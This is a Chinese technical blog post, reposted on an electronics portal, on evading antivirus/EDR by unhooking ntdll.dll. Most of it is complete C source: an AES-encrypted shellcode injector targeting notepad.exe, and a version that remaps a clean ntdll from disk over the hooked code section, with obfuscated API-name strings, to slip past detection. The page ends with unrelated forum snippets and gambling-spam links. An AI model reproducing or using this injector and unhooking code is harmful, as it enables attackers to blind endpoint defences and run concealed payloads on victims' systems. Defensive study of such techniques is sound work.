衡阳派盒市场营销有限公司

搜索歷史

清空
搜索熱詞
      0
      • 聊天消息
      • 系統消息
      • 評論與回復
      VIP于 到期 續費
      登錄后你可以
      • 下載海量資料
      • 學習在線課程
      • 觀看技術視頻
      • 寫文章/發帖/加入社區
      會員中心
      創作中心
      發布
      創作活動

      完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

      3天內不再提示

      殺軟EDR對抗-脫鉤

      蛇矛實驗室 ? 來源:蛇矛實驗室 ? 2023-06-05 09:22 ? 次閱讀

      1.殺軟掛鉤的工作原理

      一般的殺毒軟件會在我們進程啟動的時候注入DLL到進程中,然后對系統函數進行Hook(掛鉤).從而攔截我們進程的執行流程,當然這個流程只針對于未被添加到白名單的程序.我們來看下效果圖.

      f3fd28de-0305-11ee-90ce-dac502259ad0.png

      這里我設置了白名單為apps目錄,在次目錄下不會被檢測.

      我們運行一個系統自帶的軟件Notepad來看下效果.

      首先X64dbg附加進程

      f406e1c6-0305-11ee-90ce-dac502259ad0.png

      f418c5e4-0305-11ee-90ce-dac502259ad0.png

      我們隨便搜索一個函數看看是否被HOOK

      f425c302-0305-11ee-90ce-dac502259ad0.png

      f431bee6-0305-11ee-90ce-dac502259ad0.png

      可以發現函數被jmp了,那么是不是我們的函數被HOOK了,如果不清楚我們在運行一個白名單里面的程序看下,或者看JMP后到那里就可以知道了,我們這里對比一下即可.

      f43fa146-0305-11ee-90ce-dac502259ad0.png

      對比發現為在白名單里面的程序,被掛鉤了.

      這里我們寫一個注入程序,看看是否還能注入到進程中

      #include
#include
#include
#include
#include
#include
#include
#pragmacomment (lib, "crypt32.lib")
#pragmacomment (lib, "advapi32")

unsignedcharpayload[] = { 0x23, 0xe5, 0x84, 0x36, 0xce, 0x23, 0x3b, 0xe7, 0x55, 0x66, 0x8, 0x50, 0xf3, 0x44, 0xc2, 0xe8, 0x90, 0xf0, 0x8, 0x60, 0x2c, 0x2a, 0xcc, 0x7c, 0xf1, 0x6a, 0xa5, 0x48, 0x10, 0x57, 0x10, 0x7e, 0x10, 0x24, 0x5, 0x90, 0x40, 0x14, 0x7d, 0xd3, 0xba, 0x4e, 0x7f, 0x5, 0xb7, 0x17, 0xa3, 0x4, 0x91, 0x5, 0x97, 0xd7, 0xcb, 0xa2, 0x34, 0x7c, 0x90, 0xc9, 0x4f, 0x65, 0x9d, 0x18, 0x29, 0x15, 0xd8, 0xf9, 0x1d, 0xed, 0x96, 0xc4, 0x1f, 0xee, 0x2c, 0x80, 0xc8, 0x15, 0x4b, 0x68, 0x46, 0xa0, 0xe8, 0xc0, 0xb8, 0x5f, 0x5e, 0xd5, 0x5d, 0x7d, 0xd2, 0x52, 0x9b, 0x20, 0x76, 0xe0, 0xe0, 0x52, 0x23, 0xdd, 0x1a, 0x39, 0x5b, 0x66, 0x8c, 0x26, 0x9e, 0xef, 0xf, 0xfd, 0x26, 0x32, 0x30, 0xa0, 0xf2, 0x8c, 0x2f, 0xa5, 0x9, 0x2, 0x1c, 0xfe, 0x4a, 0xe8, 0x81, 0xae, 0x27, 0xcf, 0x2, 0xaf, 0x18, 0x54, 0x3c, 0x97, 0x35, 0xfe, 0xaf, 0x79, 0x35, 0xfa, 0x99, 0x3c, 0xca, 0x18, 0x8d, 0xa1, 0xac, 0x2e, 0x1e, 0x78, 0xb6, 0x4, 0x79, 0x5e, 0xa7, 0x6d, 0x7f, 0x6e, 0xa3, 0x34, 0x8b, 0x68, 0x6d, 0x2a, 0x26, 0x49, 0x1e, 0xda, 0x5e, 0xe4, 0x77, 0x29, 0x6e, 0x15, 0x9, 0x69, 0x8b, 0x8d, 0xbd, 0x42, 0xb6, 0xd9, 0xb0, 0x90, 0xd8, 0xa1, 0xb9, 0x37, 0x80, 0x8c, 0x5d, 0xaf, 0x98, 0x11, 0xef, 0xe1, 0xcf, 0xec, 0xe7, 0xc5, 0x58, 0x73, 0xf, 0xce, 0x1e, 0x27, 0x9e, 0xc0, 0x8a, 0x36, 0xd5, 0x6b, 0x9d, 0x52, 0xe, 0x68, 0x30, 0x7c, 0x45, 0x7c, 0xb3, 0xc1, 0x3f, 0x88, 0xdc, 0x78, 0x2, 0xe6, 0xbf, 0x45, 0x2d, 0x56, 0x76, 0x15, 0xc8, 0x4c, 0xe2, 0xcd, 0xa4, 0x46, 0x38, 0x6b, 0x41, 0x2b, 0xdf, 0x24, 0x2c, 0xf1, 0x82, 0x78, 0xd1, 0xc4, 0x83, 0x7f, 0x33, 0xb5, 0x8c, 0xf7, 0xac, 0x30, 0x14, 0x0, 0x6f, 0xba, 0xf7, 0x13, 0x51, 0x6a, 0x17, 0x1c, 0xf7, 0xcd, 0x43, 0x79, 0xc2, 0x57, 0xa0, 0x9c, 0x7b, 0x12, 0xce, 0x45, 0x41, 0x4e, 0xb7, 0x6b, 0xbd, 0x22, 0xc, 0xfb, 0x88, 0x2a, 0x4c, 0x2, 0x84, 0xf4, 0xca, 0x26, 0x62, 0x48, 0x6e, 0x9b, 0x3b, 0x85, 0x22, 0xff, 0xf0, 0x4f, 0x55, 0x7b, 0xc3, 0xf4, 0x9d, 0x2d, 0xe8, 0xb6, 0x44, 0x4a, 0x23, 0x2d, 0xf9, 0xe1, 0x6, 0x1c, 0x74, 0x23, 0x6, 0xdb, 0x3c, 0x3c, 0xa6, 0xce, 0xcf, 0x38, 0xae, 0x87, 0xd1, 0x8};
unsignedcharkey[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84};

unsignedintpayload_len = sizeof(payload);

intAESDecrypt(char* payload, unsignedintpayload_len, char* key, size_tkeylen){
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;

if(!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
return-1;
}
if(!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
return-1;
}
if(!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) {
return-1;
}
if(!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
return-1;
}

if(!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)payload, (DWORD*)&payload_len)) {
return-1;
}

CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);

return0;
}


intFindTarget(constchar* procname){

HANDLE hProcSnap;
PROCESSENTRY32 pe32;
intpid = 0;

hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(INVALID_HANDLE_VALUE == hProcSnap) return0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if(!Process32First(hProcSnap, &pe32)) {
CloseHandle(hProcSnap);
return0;
}

while(Process32Next(hProcSnap, &pe32)) {
if(lstrcmpiA(procname, pe32.szExeFile) == 0) {
pid = pe32.th32ProcessID;
break;
}
}

CloseHandle(hProcSnap);

returnpid;
}

intInject(HANDLE hProc, unsignedchar* payload, unsignedintpayload_len){

LPVOID pRemoteCode = NULL;
HANDLE hThread = NULL;

AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));

pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T*)NULL);

hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
if(hThread != NULL) {
WaitForSingleObject(hThread, 500);
CloseHandle(hThread);
return0;
}

return-1;
}


intmain(void){

intpid = 0;
HANDLE hProc = NULL;

pid = FindTarget("notepad.exe");

if(pid) {
printf("Notepad.exe PID = %d
", pid);

hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
FALSE, (DWORD)pid);

if(hProc != NULL) {
Inject(hProc, payload, payload_len);
CloseHandle(hProc);
}
}
return0;
}

      首先我們先在白名單下運行一下看看.

      f44cd1fe-0305-11ee-90ce-dac502259ad0.png

      發現是可以直接注入的,這很正常,因為殺軟不攔截我們的任何行為.

      那么我們放到其他地方來運行下看看效果.

      f457e7c4-0305-11ee-90ce-dac502259ad0.gif

      可以發現我們的程序直接被殺掉了,注入的進程也被關閉了.

      2.如何繞過EDR掛鉤檢測

      #include
#include
#include
#include
#include
#include
#include
#pragmacomment (lib, "crypt32.lib")
#pragmacomment (lib, "advapi32")

unsignedcharpayload[] = { 0x23, 0xe5, 0x84, 0x36, 0xce, 0x23, 0x3b, 0xe7, 0x55, 0x66, 0x8, 0x50, 0xf3, 0x44, 0xc2, 0xe8, 0x90, 0xf0, 0x8, 0x60, 0x2c, 0x2a, 0xcc, 0x7c, 0xf1, 0x6a, 0xa5, 0x48, 0x10, 0x57, 0x10, 0x7e, 0x10, 0x24, 0x5, 0x90, 0x40, 0x14, 0x7d, 0xd3, 0xba, 0x4e, 0x7f, 0x5, 0xb7, 0x17, 0xa3, 0x4, 0x91, 0x5, 0x97, 0xd7, 0xcb, 0xa2, 0x34, 0x7c, 0x90, 0xc9, 0x4f, 0x65, 0x9d, 0x18, 0x29, 0x15, 0xd8, 0xf9, 0x1d, 0xed, 0x96, 0xc4, 0x1f, 0xee, 0x2c, 0x80, 0xc8, 0x15, 0x4b, 0x68, 0x46, 0xa0, 0xe8, 0xc0, 0xb8, 0x5f, 0x5e, 0xd5, 0x5d, 0x7d, 0xd2, 0x52, 0x9b, 0x20, 0x76, 0xe0, 0xe0, 0x52, 0x23, 0xdd, 0x1a, 0x39, 0x5b, 0x66, 0x8c, 0x26, 0x9e, 0xef, 0xf, 0xfd, 0x26, 0x32, 0x30, 0xa0, 0xf2, 0x8c, 0x2f, 0xa5, 0x9, 0x2, 0x1c, 0xfe, 0x4a, 0xe8, 0x81, 0xae, 0x27, 0xcf, 0x2, 0xaf, 0x18, 0x54, 0x3c, 0x97, 0x35, 0xfe, 0xaf, 0x79, 0x35, 0xfa, 0x99, 0x3c, 0xca, 0x18, 0x8d, 0xa1, 0xac, 0x2e, 0x1e, 0x78, 0xb6, 0x4, 0x79, 0x5e, 0xa7, 0x6d, 0x7f, 0x6e, 0xa3, 0x34, 0x8b, 0x68, 0x6d, 0x2a, 0x26, 0x49, 0x1e, 0xda, 0x5e, 0xe4, 0x77, 0x29, 0x6e, 0x15, 0x9, 0x69, 0x8b, 0x8d, 0xbd, 0x42, 0xb6, 0xd9, 0xb0, 0x90, 0xd8, 0xa1, 0xb9, 0x37, 0x80, 0x8c, 0x5d, 0xaf, 0x98, 0x11, 0xef, 0xe1, 0xcf, 0xec, 0xe7, 0xc5, 0x58, 0x73, 0xf, 0xce, 0x1e, 0x27, 0x9e, 0xc0, 0x8a, 0x36, 0xd5, 0x6b, 0x9d, 0x52, 0xe, 0x68, 0x30, 0x7c, 0x45, 0x7c, 0xb3, 0xc1, 0x3f, 0x88, 0xdc, 0x78, 0x2, 0xe6, 0xbf, 0x45, 0x2d, 0x56, 0x76, 0x15, 0xc8, 0x4c, 0xe2, 0xcd, 0xa4, 0x46, 0x38, 0x6b, 0x41, 0x2b, 0xdf, 0x24, 0x2c, 0xf1, 0x82, 0x78, 0xd1, 0xc4, 0x83, 0x7f, 0x33, 0xb5, 0x8c, 0xf7, 0xac, 0x30, 0x14, 0x0, 0x6f, 0xba, 0xf7, 0x13, 0x51, 0x6a, 0x17, 0x1c, 0xf7, 0xcd, 0x43, 0x79, 0xc2, 0x57, 0xa0, 0x9c, 0x7b, 0x12, 0xce, 0x45, 0x41, 0x4e, 0xb7, 0x6b, 0xbd, 0x22, 0xc, 0xfb, 0x88, 0x2a, 0x4c, 0x2, 0x84, 0xf4, 0xca, 0x26, 0x62, 0x48, 0x6e, 0x9b, 0x3b, 0x85, 0x22, 0xff, 0xf0, 0x4f, 0x55, 0x7b, 0xc3, 0xf4, 0x9d, 0x2d, 0xe8, 0xb6, 0x44, 0x4a, 0x23, 0x2d, 0xf9, 0xe1, 0x6, 0x1c, 0x74, 0x23, 0x6, 0xdb, 0x3c, 0x3c, 0xa6, 0xce, 0xcf, 0x38, 0xae, 0x87, 0xd1, 0x8};
unsignedcharkey[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84};

unsignedintpayload_len = sizeof(payload);

typedefBOOL(WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
typedefHANDLE(WINAPI * CreateFileMappingA_t)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR);
typedefLPVOID(WINAPI * MapViewOfFile_t)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
typedefBOOL(WINAPI * UnmapViewOfFile_t)(LPCVOID);

unsignedcharsNtdll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0};
unsignedcharsKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0};

intAESDecrypt(char* payload, unsignedintpayload_len, char* key, size_tkeylen){
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;

if(!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
return-1;
}
if(!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
return-1;
}
if(!CryptHashData(hHash, (BYTE*) key, (DWORD) keylen, 0)){
return-1; 
}
if(!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
return-1;
}

if(!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, (BYTE *) payload, (DWORD *) &payload_len)){
return-1;
}

CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);

return0;
}


voidXORcrypt(charstr2xor[], size_tlen, charkey){
inti;

for(i = 0; i < len; i++) {
????????str2xor[i] = (BYTE)str2xor[i] ^ key;
????}
}



int?FindTarget(const?char?*procname)?{

????????HANDLE hProcSnap;
????????PROCESSENTRY32 pe32;
????????int?pid = 0;
????????????????
????????hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
????????if?(INVALID_HANDLE_VALUE == hProcSnap) return?0;
????????????????
????????pe32.dwSize = sizeof(PROCESSENTRY32); 
????????????????
????????if?(!Process32First(hProcSnap, &pe32)) {
????????????????CloseHandle(hProcSnap);
????????????????return?0;
????????}
????????????????
????????while?(Process32Next(hProcSnap, &pe32)) {
????????????????if?(lstrcmpiA(procname, pe32.szExeFile) == 0) {
????????????????????????pid = pe32.th32ProcessID;
????????????????????????break;
????????????????}
????????}
????????????????
????????CloseHandle(hProcSnap);
????????????????
????????return?pid;
}


int?Inject(HANDLE hProc, unsigned?char?* payload, unsigned?int?payload_len)?{

??LPVOID pRemoteCode = NULL;
??HANDLE hThread = NULL;

??AESDecrypt((char?*) payload, payload_len, (char?*) key, sizeof(key));
??
??pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
??WriteProcessMemory(hProc, pRemoteCode, (PVOID) payload, (SIZE_T) payload_len, (SIZE_T *) NULL);
??
??hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteCode, NULL, 0, NULL);
??if?(hThread != NULL) {
??????WaitForSingleObject(hThread, 500);
??????CloseHandle(hThread);
??????return?0;
??}
??return?-1;
}


static?int?UnhookNtdll(const?HMODULE hNtdll, const?LPVOID pMapping)?{
??DWORD oldprotect = 0;
??PIMAGE_DOS_HEADER pImgDOSHead = (PIMAGE_DOS_HEADER) pMapping;
??PIMAGE_NT_HEADERS pImgNTHead = (PIMAGE_NT_HEADERS)((DWORD_PTR) pMapping + pImgDOSHead->e_lfanew);
inti;

unsignedcharsVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0};

VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sVirtualProtect);

for(i = 0; i < pImgNTHead->FileHeader.NumberOfSections; i++) {
PIMAGE_SECTION_HEADER pImgSectionHead = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pImgNTHead) + 
((DWORD_PTR) IMAGE_SIZEOF_SECTION_HEADER * i));

if(!strcmp((char*) pImgSectionHead->Name, ".text")) {
VirtualProtect_p((LPVOID)((DWORD_PTR) hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
pImgSectionHead->Misc.VirtualSize,
PAGE_EXECUTE_READWRITE,
&oldprotect);
if(!oldprotect) {
return-1;
}
memcpy( (LPVOID)((DWORD_PTR) hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
(LPVOID)((DWORD_PTR) pMapping + (DWORD_PTR) pImgSectionHead->VirtualAddress),
pImgSectionHead->Misc.VirtualSize);

VirtualProtect_p((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR) pImgSectionHead->VirtualAddress),
pImgSectionHead->Misc.VirtualSize,
oldprotect,
&oldprotect);
if(!oldprotect) {
return-1;
}
return0;
}
}

return-1;
}




intmain(void){

intpid = 0;
HANDLE hProc = NULL;

unsignedcharsNtdllPath[] = { 0x59, 0x0, 0x66, 0x4d, 0x53, 0x54, 0x5e, 0x55, 0x4d, 0x49, 0x66, 0x49, 0x43, 0x49, 0x4e, 0x5f, 0x57, 0x9, 0x8, 0x66, 0x54, 0x4e, 0x5e, 0x56, 0x56, 0x14, 0x5e, 0x56, 0x56, 0x3a};

unsignedcharsCreateFileMappingA[] = { 'C','r','e','a','t','e','F','i','l','e','M','a','p','p','i','n','g','A', 0x0};
unsignedcharsMapViewOfFile[] = { 'M','a','p','V','i','e','w','O','f','F','i','l','e',0x0};
unsignedcharsUnmapViewOfFile[] = { 'U','n','m','a','p','V','i','e','w','O','f','F','i','l','e', 0x0};

unsignedintsNtdllPath_len = sizeof(sNtdllPath);
unsignedintsNtdll_len = sizeof(sNtdll);
intret = 0;
HANDLE hFile;
HANDLE hFileMapping;
LPVOID pMapping;

CreateFileMappingA_t CreateFileMappingA_p = (CreateFileMappingA_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sCreateFileMappingA);
MapViewOfFile_t MapViewOfFile_p = (MapViewOfFile_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sMapViewOfFile);
UnmapViewOfFile_t UnmapViewOfFile_p = (UnmapViewOfFile_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sUnmapViewOfFile);

XORcrypt((char*) sNtdllPath, sNtdllPath_len, sNtdllPath[sNtdllPath_len - 1]);
hFile = CreateFile((LPCSTR) sNtdllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
if( hFile == INVALID_HANDLE_VALUE ) {
return-1;
}

hFileMapping = CreateFileMappingA_p(hFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
if(! hFileMapping) {
CloseHandle(hFile);
return-1;
}

pMapping = MapViewOfFile_p(hFileMapping, FILE_MAP_READ, 0, 0, 0);
if(!pMapping) {
CloseHandle(hFileMapping);
CloseHandle(hFile);
return-1;
}

printf("Check 1!
"); getchar(); 

ret = UnhookNtdll(GetModuleHandle((LPCSTR) sNtdll), pMapping);

printf("Check 2!
"); getchar(); 

UnmapViewOfFile_p(pMapping);
CloseHandle(hFileMapping);
CloseHandle(hFile);

pid = FindTarget("notepad.exe");

if(pid) {
printf("Notepad.exe PID = %d
", pid);

hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
FALSE, (DWORD) pid);

if(hProc != NULL) {
Inject(hProc, payload, payload_len);
CloseHandle(hProc);
}
}
return0;
}

      這段代碼是加載一份新的NTDLL.DLL來恢復原本已經被破壞的NTDLL.DLL.

      整個過程就是我們首先加載一份新的NTDLL.DLL保存起來,然后將原本的代碼段屬性置成讀寫可執行的,在將我們內存加載的Text段進行替換到原來的Text段,這樣原本HOOK的地方就被我們替換過去了,達到了脫鉤的效果,我們去看下運行效果.

      f475e0d0-0305-11ee-90ce-dac502259ad0.png

      我們拖進X64DBG 看下效果吧.

      f47fb8bc-0305-11ee-90ce-dac502259ad0.png

      目前還是被HOOK的狀態,我們回車一下后x64dbg中右鍵分析這個函數.

      f48a24b4-0305-11ee-90ce-dac502259ad0.png

      發現函數已經被還原了.

      3.脫鉤后注入ShellCode到進程中

      這樣就簡單的繞過了EDR的掛鉤檢測,部分沙箱這種技術同樣可以繞過.

      f4b25678-0305-11ee-90ce-dac502259ad0.gif




      審核編輯:劉清

      聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
      • dll
        dll
        +關注

        關注

        0

        文章

        116

        瀏覽量

        45549
      • JMP
        JMP
        +關注

        關注

        1

        文章

        17

        瀏覽量

        12620
      • Shell
        +關注

        關注

        1

        文章

        366

        瀏覽量

        23445
      • EDR
        EDR
        +關注

        關注

        0

        文章

        23

        瀏覽量

        2010

      原文標題:殺軟EDR對抗-脫鉤

      文章出處:【微信號:蛇矛實驗室,微信公眾號:蛇矛實驗室】歡迎添加關注!文章轉載請注明出處。

      收藏 人收藏

        評論

        相關推薦

        小七免論壇vip 2013源碼免培訓課程

        小七免論壇vip 2013源碼免培訓課程目錄(今日免key發布)小七免論壇vip 2013源碼免培訓課程解壓密碼:www.fanlu8.com如果www.fanlu8.com密
        發表于 10-05 17:35

        求有關電子對抗有關的matlab程序

        求大神,誰有有關電子對抗,雷達對抗,光電干擾有關的matlab程序
        發表于 06-03 10:52

        請問藍牙2.1+edr模塊和4.0+edr/BLE模塊的EDR速率一樣嗎?

        大家好關于藍牙問題,請教大家1、現在有藍牙2.1+edr模塊,也有藍牙4.0+edr/BLE模塊,請問這兩種藍牙的EDR速率一樣嗎?2、藍牙4.0 EDR +SPP+BLE模塊怎么理解
        發表于 02-21 04:43

        EDR的測試方法

        上一個章節我們已經學會了Non-Signalling mode(非信令模式)的BR測試方法,接下來我們就來看看EDR(Enhance Data Rate)的測試方法。測試架設圖如下:下表紅框框所標示
        發表于 09-20 09:05

        簡述電子對抗綜合模擬訓練平臺

        電子對抗綜合模擬訓練平臺以電子戰部隊指揮機構為主要訓練對象,開展集電子對抗、指揮干預、戰術使用、仿真推演、訓練監控與評估等功能的綜合電子對抗作戰訓練,旨在解決現行訓練保障難以滿足實戰化訓練需求、現行訓練考評難以檢驗實戰化訓練質量
        發表于 09-01 10:50

        如何解決安卓系統后臺問題?

        現在的安卓系統(Android7.1),后臺是不是有點狠呢,,軟件界面切換到桌面,直接走destroy方法了。是否可以修改安卓系統的策略呢?
        發表于 12-30 07:33

        WAF上傳繞過+wbehshell免

        WAF上傳繞過+wbehshell免
        發表于 09-07 10:35 ?4次下載
        <b class='flag-5'>軟</b>WAF上傳繞過+wbehshell免<b class='flag-5'>殺</b>

        CCSA等行業協會擬與工信部脫鉤

        據了解,本次被列入脫鉤名單的全國性行業協會商會共有795家,其中已脫鉤422家,擬脫鉤373家。
        的頭像 發表于 06-20 09:23 ?6174次閱讀

        技術與技術的區別

        ,又叫免殺毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。
        的頭像 發表于 07-08 10:49 ?1672次閱讀

        APM32F103RCT7汽車EDR應用方案

        EDR系統的硬件電路主要由4大部分組成:微控制系統、存儲器電路、電源電路及傳感器電路,其中微控制系統是EDR的核心部分,需要滿足EDR系統在汽車復雜的工作環境中保障系統穩定運行,因而車規級MCU是微控制系統的關鍵所在。
        的頭像 發表于 08-16 15:54 ?1213次閱讀

        汽車的領域的EDR和DSSAD術語解析

        EDR 功能的實現方式多種多樣,有的集成在氣囊控制器內部,有的是由單獨或多個電子部件組成。因此定義EDR 系統為由一個或多個車載電子模塊構成,具有監測、采集并記錄碰撞事件發生前、發生時和發生后車輛和乘員保護系統的數據功能的裝置或系統。
        發表于 10-17 10:42 ?2792次閱讀

        ASML與中國脫鉤

        ASML認為脫鉤是不可能的,這將極其困難且成本高昂。
        的頭像 發表于 06-25 10:23 ?744次閱讀

        什么是白加黑技術 免技術之白加黑攻擊防御技術分析

        在很多的中會對白文件的操作進行放行,如果我們將黑程序和白程序在一個進程中是否就可以繞過一些的檢測。
        發表于 07-24 10:37 ?1619次閱讀
        什么是白加黑技術 免<b class='flag-5'>殺</b>技術之白加黑攻擊防御技術分析

        edr系統軟件有什么用 EDR系統與傳統殺毒軟件有什么區別

        EDR(Endpoint Detection and Response)系統軟件是一種用于監測和應對網絡終端設備上的安全威脅的軟件。 一、EDR系統軟件的作用: 實時監測和檢測:EDR系統軟件
        的頭像 發表于 01-19 10:15 ?8286次閱讀

        藍牙模塊所用的EDR是什么?

        數據傳輸呢?答案就在于藍牙模塊所采用的EDR(Extended Data Rate)技術。本文美迅物聯網MesoonRF將為您詳細介紹藍牙模塊所用的EDR是什么。 ? 一、什么是EDR? ?E
        的頭像 發表于 05-24 14:23 ?587次閱讀
        棋牌百家乐程序破解| 东莞百家乐官网的玩法技巧和规则 | 百家乐官网电子路单谁| 沙龙国际网上| 蓝盾百家乐赌场娱乐网规则| 名人百家乐官网的玩法技巧和规则| 简阳市| 大发888吧| 百家乐7杀6| 至富百家乐官网的玩法技巧和规则| 百家乐官网视频金币| 大发888网站是多少呢| 百家乐官网平玩法官方网址| 澳门百家乐官网娱乐城怎么样| 六合彩彩图| 20人百家乐桌| 玩百家乐官网如何硬| 屏边| 大发888娱乐场开户| 百家乐官网的各种打法| 阿鲁科尔沁旗| 会宁县| 凯旋门百家乐官网游戏| 和乐娱乐| bet365注册哪家好 | 百家乐官网试玩全讯网2| 大发888官方下载168| 至尊百家乐娱乐网| 百家乐官网统计工具| 新奥博百家乐官网娱乐城| 澳门百家乐官网秘诀| 金利娱乐城代理| 海南太阳城大酒店| 百家乐官网博彩优惠论坛| 彩票预测网| bet365贴吧| 大发888亚付宝充值| 威尼斯人娱乐棋牌| 苹果百家乐的玩法技巧和规则| 百家乐赌场占多大概率| 百家乐看单技术|